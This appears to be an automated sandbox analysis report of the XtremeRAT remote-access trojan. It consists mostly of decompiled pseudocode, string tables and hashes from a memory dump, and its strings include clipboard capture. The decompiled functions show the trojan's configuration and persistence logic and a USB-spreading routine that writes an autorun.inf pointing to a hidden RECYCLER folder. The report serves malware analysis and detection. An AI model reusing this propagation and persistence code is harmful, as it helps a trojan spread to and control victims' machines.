0x10008731
0x10008736
0x1000873b
0x10008746
0x1000874a
0x1000874b
0x10008750
0x10008751
0x10008751
0x10008714
0x100086e8
0x00000000
0x100086df
0x10008615
0x1000861a
0x00000000
0x10008620
0x10008628
0x1000862d
0x10008632
0x10008635
0x1000863a
0x10008645
0x10008655
0x1000865a
0x10008660
0x1000866b
0x10008670
0x10008675
0x1000867b
0x10008680
0x10008698
0x1000869d
0x100086a3
0x100086b3
0x100086b8
0x100086c6
0x00000000
0x100086c6

Strings

, xrefs: 100086A3
temp, xrefs: 10008800, 10008827, 1000885D
], xrefs: 100089F4
--- , xrefs: 10008680, 100089D1
SOFTWARE\, xrefs: 10008B3A
qualquercoisarsrsr, xrefs: 10008AAD
LastSize, xrefs: 10008B4A
[Clipboard End], xrefs: 10008A3B
[Clipboard, xrefs: 100089CC
[, xrefs: 10008660
, xrefs: 1000862D, 10008650, 100089BC, 10008A46

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $ --- $$[$[Clipboard$[Clipboard End]$LastSize$SOFTWARE\$]$qualquercoisarsrsr$temp
API String ID: 0-3009520543
Opcode ID: 779d53ca8fe55552b1ceab16a14ff218901e1d0717973ec1ab609bf966c74ce1
Instruction ID: 057d20e264fa80afaee32c8a6c883f4daf1d9cc34b90863f49a2566050bc1c08
Opcode Fuzzy Hash: 779d53ca8fe55552b1ceab16a14ff218901e1d0717973ec1ab609bf966c74ce1
Instruction Fuzzy Hash: 6DF16F74A00219ABFB51DB64CC81FDE73B9FB083C0F508065F148A72ADDB75AE858B65

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0F4, Relevance: 14.2, Strings: 11, Instructions: 400
COMMON

Download Yara Rule

C-Code - Quality: 57%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				void _v5040;
				char _v5044;
				char _v5048;
				void _v5572;
				char _v5576;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char* _t62;
				void* _t120;
				void* _t122;
				intOrPtr* _t147;
				intOrPtr* _t150;
				void* _t163;
				intOrPtr _t164;
				intOrPtr _t167;
				void* _t230;
				void* _t231;
				void* _t232;
				void* _t233;
				intOrPtr _t287;
				intOrPtr _t291;
				void* _t322;
				void* _t326;
				void* _t335;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				void* _t354;

				_t229 = __ebx;
				_t340 = _t341;
				_t233 = 0x2bc;
				do {
					_push(0);
					_push(0);
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_push(__ebx);
				E10004CE4(E1000D030);
				_push(_t340);
				_push(0x1000d759);
				_push( *[fs:eax]);
				 *[fs:eax] = _t341;
				E10003024(0x1000d0d0);
				_t62 =  *0x1000e134; // 0x1000e020
				 *_t62 = 1;
				_push(0x8007);
				L10004F20();
				E10005954(1,  &_v24);
				E10003A34(_v24, L"restart");
				if(0 == 0) {
					E10005954(0,  &_v28);
					E100037AC(0x10012580, _v28);
					_push(0);
					_push(0);
					_push(0);
					_push(E1000390C( *0x10012580));
					_push(L"open");
					_push(0);
					L1000B6F8();
					_push(0);
					L10004E38();
				}
				E10005954(1,  &_v32);
				E10003A34(_v32, L"update");
				if(0 == 0) {
					_push(0x1770);
					L10004F58();
				}
				E100050D8();
				E100051E8(0,  &_v5040);
				memcpy(0x1000f834,  &_v5040, 0x4e4 << 2);
				_t322 = 0x1000f834;
				E10003BE4(0x10012580, 0x9c8);
				E100050D0(E1000390C( *0x10012580), _t322);
				E10006234( *0x10012580, _t229,  &_v5044, L"CONFIG",  &_v5040, 0);
				E100037AC(0x10012580, _v5044);
				E100050D8();
				E100050D0(_t322, E1000390C( *0x10012580));
				_t334 = _t322;
				memcpy(0x10010dd4, _t322, 0x4e4 << 2);
				_t343 = _t341 + 0x18;
				_t326 = _t322;
				E100037AC(0x100432d4, L"SOFTWARE\\XtremeRAT");
				_push(E1000390C( *0x100432d4));
				L1000C070();
				_t13 = _t326 + 0xfaa; // 0x100107de
				E100038E0(0x100432d4, 0x3d, _t13);
				E1000577C(0x80000001, _t229, L"Mutex", L"SOFTWARE\\XtremeRAT", _t322, 0, 2,  *0x100432d4);
				E10005664( &_v5572);
				E100038E0( &_v5048, 0x105,  &_v5572);
				E10003928( &_v5048, 0x105, L"\\Microsoft\\Windows\\", 0);
				if(E10005690(E1000390C(_v5048), 0x80000001) != 1) {
					E10005664( &_v5572);
					E100038E0( &_v5584, 0x105,  &_v5572);
					_push(_v5584);
					_push( *0x1000e0f8);
					_t31 = _t326 + 0xfaa; // 0x100107de
					_t245 = 0x3d;
					E100038E0( &_v5588, 0x3d, _t31);
					_push(_v5588);
					_push(L".cfg");
					E100039EC();
				} else {
					E10005664( &_v5572);
					E100038E0( &_v5576, 0x105,  &_v5572);
					_push(_v5576);
					_push(L"\\Microsoft\\Windows\\");
					_t24 = _t326 + 0xfaa; // 0x100107de
					_t245 = 0x3d;
					E100038E0( &_v5580, 0x3d, _t24);
					_push(_v5580);
					_push(L".cfg");
					E100039EC();
				}
				_t230 = E1000390C( *0x10012584);
				_t120 = E10005CA4(_t230);
				_t349 = _t120;
				if(_t120 != 0) {
					_push(0x80);
					_push(_t230);
					L10004F30();
					 *0x100432cc = E1000CF04(_t230, 0x10012588);
					 *0x100432d0 = 0x10012588;
					E10005F1C( *0x10012584, _t230, _t245, _t334);
					E10003BE4(0x10012580, E10003FD4( *0x100432cc,  *0x100432d0, 2, 0));
					E100050D0(E1000390C( *0x10012580), 0x10012588);
					E10006234( *0x10012580, _t230,  &_v5592, L"CONFIG", _t334, _t349);
					E100037AC(0x10012580, _v5592);
					E100050D8();
					E100050D0(_t326, E1000390C( *0x10012580));
				}
				if( *((intOrPtr*)(_t326 + 0x1388)) != 0x1e240) {
					_push(0x80);
					_push(_t230);
					L10004F30();
					_push(_t230);
					L10004E30();
					E100050D8();
					E100051E8(0,  &_v5040);
					memcpy(_t326,  &_v5040, 0x4e4 << 2);
					_t343 = _t343 + 0xc;
					_t326 = _t326;
					E10003BE4(0x10012580, 0x9c8);
					E100050D0(E1000390C( *0x10012580), _t326);
					E10006234( *0x10012580, _t230,  &_v5596, L"CONFIG",  &_v5040, 0);
					E100037AC(0x10012580, _v5596);
					E100050D8();
					E100050D0(_t326, E1000390C( *0x10012580));
				}
				_t41 = _t326 + 0xfaa; // 0x100107de
				_t122 = E10004DF0(0, 0, _t41);
				_t231 = _t122;
				L10004E88();
				if(_t122 == 0xb7) {
					_push(0);
					L10004E38();
				}
				_push(_t231);
				L10004DC0();
				if( *((char*)(_t326 + 0xfa8)) == 1) {
					_t43 = _t326 + 0x109e; // 0x100108d2
					_t163 = E10004DF0(0, 0, _t43);
					_t231 = _t163;
					L10004E88();
					_t354 = _t163 - 0xb7;
					if(_t354 == 0) {
						_push(_t231);
						L10004DC0();
					} else {
						_push(_t231);
						L10004DC0();
						_t164 =  *0x1000e0f4; // 0x781894
						_push(E1000391C(_t164) + _t165);
						_t167 =  *0x1000e0f4; // 0x781894
						E100050D0(0x10012374, E1000390C(_t167));
						E100098A8(E10009950(0x10012374), _t326, E1000C9D0);
					}
				}
				_push(0x20a);
				_push(0x10010bc4);
				_push(0);
				L10004E98();
				_t45 = _t326 + 0xbd2; // 0x10010406
				E100038E0( &_v5600, 0x3d, _t45);
				_t287 =  *0x1000e0f0; // 0x781bb4
				E10003A34(_v5600, _t287);
				if(_t354 != 0) {
					_t48 = _t326 + 0xbd2; // 0x10010406
					E100038E0( &_v5604, 0x3d, _t48);
					_t289 =  *0x1000e0ec; // 0x77316c
					E10003A34(_v5604, _t289);
					if(__eflags != 0) {
						_t53 = _t326 + 0xbd2; // 0x10010406
						_t289 = _t53;
						E100050D0(0x10012164, _t53);
						_t335 = E10009950(0x10012164);
					} else {
						E100054C4( &_v5572, __eflags);
						memcpy(0x10012164,  &_v5572, 0x82 << 2);
						asm("movsw");
						_t326 = _t326;
						_t335 = E10009950(0x10012164);
					}
				} else {
					_t335 = 0;
				}
				 *0x10012370 = 0;
				if(_t335 != 0) {
					while(1) {
						_t290 = E1000C080;
						_t232 = E100098A8(_t335, 0x10010bc4, E1000C080);
						__eflags = _t232;
						if(_t232 == 0) {
							_t150 =  *0x1000e0fc; // 0x1000e000
							_push( *_t150);
							_push(_t335);
							L10004F60();
							_t335 = E10009950(0x10012164);
							_push(0x1f4);
							L10004F58();
						}
						 *0x10012370 =  *0x10012370 + 1;
						__eflags = _t232;
						if(_t232 != 0) {
							break;
						}
						__eflags =  *0x10012370 - 7;
						if( *0x10012370 < 7) {
							continue;
						}
						break;
					}
					E1000B78C(_t326, _t232, _t290, _t326, _t335);
					__eflags = _t232;
					if(_t232 == 0) {
						_t147 =  *0x1000e0fc; // 0x1000e000
						_push( *_t147);
						_push(_t335);
						L10004F60();
						E1000C080(_t232, _t326, _t335, 0x10010bc4);
					}
					goto L32;
				} else {
					E1000B78C(_t326, _t231, _t289, _t326, _t335);
					E1000C080(_t231, _t326, _t335, 0x10010bc4);
					L32:
					_pop(_t291);
					 *[fs:eax] = _t291;
					_push(E1000D760);
					E10003788( &_v5604, 8);
					E10003788( &_v5048, 2);
					return E10003788( &_v32, 3);
				}
			}

0x1000d0f4
0x1000d0f5
0x1000d0f7
0x1000d0fc
0x1000d0fc
0x1000d0fe
0x1000d100
0x1000d100
0x1000d103
0x1000d10b
0x1000d117
0x1000d118
0x1000d11d
0x1000d120
0x1000d128
0x1000d12d
0x1000d132
0x1000d135
0x1000d13a
0x1000d147
0x1000d154
0x1000d159
0x1000d160
0x1000d16d
0x1000d172
0x1000d174
0x1000d176
0x1000d182
0x1000d183
0x1000d188
0x1000d18a
0x1000d18f
0x1000d191
0x1000d191
0x1000d19e
0x1000d1ab
0x1000d1b0
0x1000d1b2
0x1000d1b7
0x1000d1b7
0x1000d1c3
0x1000d1d0
0x1000d1e1
0x1000d1e3
0x1000d1ee
0x1000d204
0x1000d219
0x1000d229
0x1000d235
0x1000d24d
0x1000d253
0x1000d25f
0x1000d25f
0x1000d261
0x1000d26c
0x1000d27b
0x1000d281
0x1000d28b
0x1000d296
0x1000d2b2
0x1000d2bd
0x1000d2d3
0x1000d2e3
0x1000d2fa
0x1000d360
0x1000d376
0x1000d37b
0x1000d381
0x1000d38d
0x1000d393
0x1000d398
0x1000d39d
0x1000d3a3
0x1000d3b2
0x1000d2fc
0x1000d302
0x1000d318
0x1000d31d
0x1000d323
0x1000d32e
0x1000d334
0x1000d339
0x1000d33e
0x1000d344
0x1000d353
0x1000d353
0x1000d3c1
0x1000d3c5
0x1000d3ca
0x1000d3cc
0x1000d3d2
0x1000d3d7
0x1000d3d8
0x1000d3e9
0x1000d3ef
0x1000d3fa
0x1000d41b
0x1000d435
0x1000d44a
0x1000d45a
0x1000d466
0x1000d47e
0x1000d47e
0x1000d48d
0x1000d493
0x1000d498
0x1000d499
0x1000d49e
0x1000d49f
0x1000d4ab
0x1000d4b8
0x1000d4c9
0x1000d4c9
0x1000d4cb
0x1000d4d6
0x1000d4ec
0x1000d501
0x1000d511
0x1000d51d
0x1000d535
0x1000d535
0x1000d53a
0x1000d545
0x1000d54a
0x1000d54c
0x1000d556
0x1000d558
0x1000d55a
0x1000d55a
0x1000d55f
0x1000d560
0x1000d56c
0x1000d56e
0x1000d579
0x1000d57e
0x1000d580
0x1000d585
0x1000d58a
0x1000d5d2
0x1000d5d3
0x1000d58c
0x1000d58c
0x1000d58d
0x1000d592
0x1000d59e
0x1000d59f
0x1000d5b1
0x1000d5cb
0x1000d5cb
0x1000d58a
0x1000d5d8
0x1000d5dd
0x1000d5e2
0x1000d5e4
0x1000d5ef
0x1000d5fa
0x1000d605
0x1000d60b
0x1000d610
0x1000d61c
0x1000d627
0x1000d632
0x1000d638
0x1000d63d
0x1000d66e
0x1000d66e
0x1000d67e
0x1000d68d
0x1000d63f
0x1000d645
0x1000d65b
0x1000d65d
0x1000d65f
0x1000d66a
0x1000d66a
0x1000d612
0x1000d612
0x1000d612
0x1000d691
0x1000d698
0x1000d6ad
0x1000d6b2
0x1000d6be
0x1000d6c0
0x1000d6c2
0x1000d6c4
0x1000d6cb
0x1000d6cc
0x1000d6cd
0x1000d6dc
0x1000d6de
0x1000d6e3
0x1000d6e3
0x1000d6e8
0x1000d6ee
0x1000d6f0
0x00000000
0x00000000
0x1000d6f2
0x1000d6f9
0x00000000
0x00000000
0x00000000
0x1000d6f9
0x1000d6fd
0x1000d702
0x1000d704
0x1000d706
0x1000d70d
0x1000d70e
0x1000d70f
0x1000d719
0x1000d719
0x00000000
0x1000d69a
0x1000d69c
0x1000d6a6
0x1000d71e
0x1000d720
0x1000d723
0x1000d726
0x1000d736
0x1000d746
0x1000d758
0x1000d758

Strings

Mutex, xrefs: 1000D2A3
l1w, xrefs: 1000D632
restart, xrefs: 1000D14F
update, xrefs: 1000D1A6
open, xrefs: 1000D183
HgDdsuTd, xrefs: 1000D540
SOFTWARE\XtremeRAT, xrefs: 1000D267, 1000D2A8
\Microsoft\Windows\, xrefs: 1000D2DE, 1000D323
.cfg, xrefs: 1000D344, 1000D3A3
HgDdsuTdPERSIST, xrefs: 1000D574
CONFIG, xrefs: 1000D20F, 1000D440, 1000D4F7

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .cfg$CONFIG$HgDdsuTd$HgDdsuTdPERSIST$Mutex$SOFTWARE\XtremeRAT$\Microsoft\Windows\$l1w$open$restart$update
API String ID: 0-1447232261
Opcode ID: b25be51fba2d0f65df071fbb7db729566f5925429d87ceaf1aa7f8b9bf906716
Instruction ID: 7babdffad351a71ae314de662e95e98ead1dbb94228c143735747afee298a140
Opcode Fuzzy Hash: b25be51fba2d0f65df071fbb7db729566f5925429d87ceaf1aa7f8b9bf906716
Instruction Fuzzy Hash: E2E1B5787005559BF715E764CC82B9FB3AAEB803C0F508061F5489B29EEEB5FE418B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B0D0, Relevance: 13.9, Strings: 11, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E1000B0D0(intOrPtr* __eax, void* __ebx, void* __ecx, signed int __edx, signed int __esi) {
				void* _v1;
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				signed char _t60;
				signed char _t61;
				signed char _t62;
				signed char _t63;
				void* _t71;
				void* _t92;
				void* _t98;
				signed char _t117;
				intOrPtr _t120;
				intOrPtr _t133;
				void* _t142;
				void* _t148;
				signed int _t150;
				intOrPtr _t151;
				intOrPtr _t152;

				_t147 = __esi;
				_t60 = __eax +  *__eax;
				 *_t60 =  *_t60 + _t60;
				_pop(_t152);
				 *_t60 =  *_t60 + _t60;
				 *((intOrPtr*)(__ecx + __esi * 4)) =  *((intOrPtr*)(__ecx + __esi * 4)) + _t60;
				 *_t60 =  *_t60 + __edx;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t61 = _t60 & 0x000000b1;
				 *_t61 =  *_t61 + __edx;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				asm("adc [eax], cl");
				 *_t61 =  *_t61 + _t61;
				 *((intOrPtr*)(_t61 + __edx)) =  *((intOrPtr*)(_t61 + __edx)) + __ebx;
				 *_t61 =  *_t61 + __edx;
				asm("clc");
				 *_t61 =  *_t61 - _t61;
				asm("adc [edx+ebp], al");
				 *_t61 =  *_t61 + __edx;
				 *_t61 =  *_t61 + __edx;
				_t62 = _t61 | 0x0000002a;
				 *_t62 =  *_t62 + __edx;
				 *__edx =  *__edx;
				 *_t62 =  *_t62 + __edx;
				asm("fsubr qword [eax]");
				 *_t62 =  *_t62 + __edx;
				asm("clc");
				 *_t62 =  *_t62 - _t62;
				asm("adc [ecx+ebp], dh");
				 *_t62 =  *_t62 + __edx;
				_push(cs);
				 *_t62 =  *_t62 + _t62;
				 *_t62 =  *_t62 + _t62;
				 *0 =  *0 + _t62;
				 *_t62 =  *_t62 + _t62;
				 *((intOrPtr*)(_t62 + __edx)) =  *((intOrPtr*)(_t62 + __edx));
				 *_t62 =  *_t62 + __edx;
				_t63 = _t62;
				 *_t63 =  *_t63 + _t63;
				 *(_t148 + 0x53 + __edx * 2) =  *(_t148 + 0x53 + __edx * 2) | __edx;
				asm("popad");
				_t150 =  *(__esi - 0x70) * 0x51ec8b55;
				_push(_t150);
				_t151 = _t152;
				_push(0);
				_t120 = 6;
				do {
					_push(0);
					_push(0);
					_t120 = _t120 - 1;
					_t154 = _t120;
				} while (_t120 != 0);
				_t16 =  &_v8;
				 *_t16 = _t120;
				_push(__ebx);
				_v8 =  *_t16;
				_t117 = _t63;
				E10003C28( &_v8);
				_push(_t151);
				_push(0x1000b2fa);
				 *[fs:eax] = _t152;
				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t154);
				_t71 = E10005690(E1000390C(_v12),  *[fs:eax]);
				_t155 = _t71;
				if(_t71 != 0) {
					_push(0);
					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
					_t125 = _v24;
					E10003988( &_v20, _v24, _v12, _t155);
					_push(E1000390C(_v20));
					_push(E1000390C( *((intOrPtr*)(_t117 + 4))));
					L10004DC8();
					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _v24,  &_v28);
					_push(_v28);
					_push(0x1000b418);
					_push(L"icon=shell32.dll,4");
					_push(0x1000b418);
					_push(L"shellexecute=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _v24,  &_v32);
					_push(_v32);
					_push(0x1000b418);
					_push(L"label=PENDRIVE");
					_push(0x1000b418);
					_push(L"action=Open folder to view files");
					_push(0x1000b418);
					_push(L"shell\\Open=Open");
					_push(0x1000b418);
					_push(L"shell\\Open\\command=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _t125,  &_v36);
					_push(_v36);
					_push(0x1000b418);
					_push(L"shell\\Open\\Default=1");
					E100039EC();
					_t92 = E1000391C(_v16) + _t91;
					_t156 = _t92;
					asm("cdq");
					_push(0x14);
					_push(_t92);
					_push(E1000390C(_v16));
					E10003988( &_v40, L"autorun.inf", _v8, _t92);
					_t98 = E1000390C(_v40);
					_pop(_t142);
					E10005EB4(_t98, _t142);
					E10003988( &_v44, L"autorun.inf", _v8, _t92);
					E10005F1C(_v44, _t117, L"autorun.inf", __esi);
					_t128 = L"RECYCLER\\";
					E10003988( &_v48, L"RECYCLER\\", _v8, _t92);
					E10005F1C(_v48, _t117, L"RECYCLER\\", __esi);
					E10005F1C(_v12, _t117, L"RECYCLER\\", __esi);
					E1000B038( *((intOrPtr*)(_t117 + 4)), _t117, _t128,  &_v56);
					E10003988( &_v52, _v56, _v12, _t156);
					E10005F1C(_v52, _t117, _v56, _t147);
				}
				_pop(_t133);
				 *[fs:eax] = _t133;
				_push(E1000B301);
				return E10003788( &_v56, 0xd);
			}

0x1000b0d0
0x1000b0d0
0x1000b0d2
0x1000b0d4
0x1000b0d5
0x1000b0d7
0x1000b0da
0x1000b0dc
0x1000b0de
0x1000b0e0
0x1000b0e2
0x1000b0e4
0x1000b0e6
0x1000b0e8
0x1000b0ea
0x1000b0ec
0x1000b0ee
0x1000b0f0
0x1000b0f2
0x1000b0f4
0x1000b0f6
0x1000b0fb
0x1000b0fd
0x1000b0ff
0x1000b102
0x1000b104
0x1000b105
0x1000b107
0x1000b10a
0x1000b10e
0x1000b110
0x1000b112
0x1000b114
0x1000b116
0x1000b118
0x1000b11a
0x1000b11c
0x1000b11d
0x1000b11f
0x1000b122
0x1000b124
0x1000b125
0x1000b127
0x1000b129
0x1000b12b
0x1000b12d
0x1000b130
0x1000b132
0x1000b134
0x1000b136
0x1000b13c
0x1000b13d
0x1000b140
0x1000b141
0x1000b143
0x1000b144
0x1000b149
0x1000b149
0x1000b14b
0x1000b14d
0x1000b14d
0x1000b14d
0x1000b150
0x1000b150
0x1000b153
0x1000b154
0x1000b157
0x1000b15c
0x1000b163
0x1000b164
0x1000b16c
0x1000b17a
0x1000b187
0x1000b18c
0x1000b18e
0x1000b194
0x1000b19c
0x1000b1a1
0x1000b1aa
0x1000b1b7
0x1000b1c0
0x1000b1c1
0x1000b1c6
0x1000b1d1
0x1000b1d6
0x1000b1d9
0x1000b1de
0x1000b1e3
0x1000b1e8
0x1000b1ed
0x1000b1f8
0x1000b1fd
0x1000b200
0x1000b205
0x1000b20a
0x1000b20f
0x1000b214
0x1000b219
0x1000b21e
0x1000b223
0x1000b228
0x1000b233
0x1000b238
0x1000b23b
0x1000b240
0x1000b24d
0x1000b25a
0x1000b25a
0x1000b25c
0x1000b25d
0x1000b25e
0x1000b267
0x1000b273
0x1000b27b
0x1000b280
0x1000b281
0x1000b291
0x1000b299
0x1000b2a1
0x1000b2a9
0x1000b2b1
0x1000b2b9
0x1000b2c4
0x1000b2d2
0x1000b2da
0x1000b2da
0x1000b2e1
0x1000b2e4
0x1000b2e7
0x1000b2f9

Strings

icon=shell32.dll,4, xrefs: 1000B1DE
RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B172, 1000B1ED, 1000B228
shell\Open=Open, xrefs: 1000B219
shell\Open\Default=1, xrefs: 1000B240
action=Open folder to view files, xrefs: 1000B20F
label=PENDRIVE, xrefs: 1000B205
shell\Open\command=, xrefs: 1000B223
autorun.inf, xrefs: 1000B26B, 1000B289
RECYCLER\, xrefs: 1000B2A1
[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B1C6
shellexecute=, xrefs: 1000B1E8

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
API String ID: 0-631342129
Opcode ID: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
Instruction ID: e38e5125926d32c1d26ff353fbb275c64c03e2d6fa0b8cc01eec99beb1e39287
Opcode Fuzzy Hash: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
Instruction Fuzzy Hash: CA616334909688AFEB03DF64CC519DEBF75DF46280B5580E6F040AB15BD774AE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B140, Relevance: 13.9, Strings: 11, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E1000B140(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _t52;
				void* _t73;
				void* _t79;
				void* _t98;
				intOrPtr _t100;
				intOrPtr _t111;
				void* _t120;
				intOrPtr _t127;
				intOrPtr _t128;

				_t125 = __esi;
				_t127 = _t128;
				_t100 = 6;
				do {
					_push(0);
					_push(0);
					_t100 = _t100 - 1;
					_t129 = _t100;
				} while (_t100 != 0);
				_t1 =  &_v8;
				 *_t1 = _t100;
				_v8 =  *_t1;
				_t98 = __eax;
				E10003C28( &_v8);
				_push(_t127);
				_push(0x1000b2fa);
				 *[fs:eax] = _t128;
				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t129);
				_t52 = E10005690(E1000390C(_v12),  *[fs:eax]);
				_t130 = _t52;
				if(_t52 != 0) {
					_push(0);
					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
					_t105 = _v24;
					E10003988( &_v20, _v24, _v12, _t130);
					_push(E1000390C(_v20));
					_push(E1000390C( *((intOrPtr*)(_t98 + 4))));
					L10004DC8();
					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _v24,  &_v28);
					_push(_v28);
					_push(0x1000b418);
					_push(L"icon=shell32.dll,4");
					_push(0x1000b418);
					_push(L"shellexecute=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _v24,  &_v32);
					_push(_v32);
					_push(0x1000b418);
					_push(L"label=PENDRIVE");
					_push(0x1000b418);
					_push(L"action=Open folder to view files");
					_push(0x1000b418);
					_push(L"shell\\Open=Open");
					_push(0x1000b418);
					_push(L"shell\\Open\\command=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _t105,  &_v36);
					_push(_v36);
					_push(0x1000b418);
					_push(L"shell\\Open\\Default=1");
					E100039EC();
					_t73 = E1000391C(_v16) + _t72;
					_t131 = _t73;
					asm("cdq");
					_push(0x14);
					_push(_t73);
					_push(E1000390C(_v16));
					E10003988( &_v40, L"autorun.inf", _v8, _t73);
					_t79 = E1000390C(_v40);
					_pop(_t120);
					E10005EB4(_t79, _t120);
					E10003988( &_v44, L"autorun.inf", _v8, _t73);
					E10005F1C(_v44, _t98, L"autorun.inf", __esi);
					_t108 = L"RECYCLER\\";
					E10003988( &_v48, L"RECYCLER\\", _v8, _t73);
					E10005F1C(_v48, _t98, L"RECYCLER\\", __esi);
					E10005F1C(_v12, _t98, L"RECYCLER\\", __esi);
					E1000B038( *((intOrPtr*)(_t98 + 4)), _t98, _t108,  &_v56);
					E10003988( &_v52, _v56, _v12, _t131);
					E10005F1C(_v52, _t98, _v56, _t125);
				}
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E1000B301);
				return E10003788( &_v56, 0xd);
			}

0x1000b140
0x1000b141
0x1000b144
0x1000b149
0x1000b149
0x1000b14b
0x1000b14d
0x1000b14d
0x1000b14d
0x1000b150
0x1000b150
0x1000b154
0x1000b157
0x1000b15c
0x1000b163
0x1000b164
0x1000b16c
0x1000b17a
0x1000b187
0x1000b18c
0x1000b18e
0x1000b194
0x1000b19c
0x1000b1a1
0x1000b1aa
0x1000b1b7
0x1000b1c0
0x1000b1c1
0x1000b1c6
0x1000b1d1
0x1000b1d6
0x1000b1d9
0x1000b1de
0x1000b1e3
0x1000b1e8
0x1000b1ed
0x1000b1f8
0x1000b1fd
0x1000b200
0x1000b205
0x1000b20a
0x1000b20f
0x1000b214
0x1000b219
0x1000b21e
0x1000b223
0x1000b228
0x1000b233
0x1000b238
0x1000b23b
0x1000b240
0x1000b24d
0x1000b25a
0x1000b25a
0x1000b25c
0x1000b25d
0x1000b25e
0x1000b267
0x1000b273
0x1000b27b
0x1000b280
0x1000b281
0x1000b291
0x1000b299
0x1000b2a1
0x1000b2a9
0x1000b2b1
0x1000b2b9
0x1000b2c4
0x1000b2d2
0x1000b2da
0x1000b2da
0x1000b2e1
0x1000b2e4
0x1000b2e7
0x1000b2f9

Strings

icon=shell32.dll,4, xrefs: 1000B1DE
RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B172, 1000B1ED, 1000B228
shell\Open=Open, xrefs: 1000B219
shell\Open\Default=1, xrefs: 1000B240
action=Open folder to view files, xrefs: 1000B20F
label=PENDRIVE, xrefs: 1000B205
shell\Open\command=, xrefs: 1000B223
autorun.inf, xrefs: 1000B26B, 1000B289
RECYCLER\, xrefs: 1000B2A1
[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B1C6
shellexecute=, xrefs: 1000B1E8

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
API String ID: 0-631342129
Opcode ID: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
Instruction ID: 6ae93d5114324f60805c066673cfebbd25bb18d06d828e6891266f46ee2437b0
Opcode Fuzzy Hash: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
Instruction Fuzzy Hash: 71410E38900909ABEB05EF94CD82DDEB7B9EF44281F90C165F500B725EDB71BE058BA0

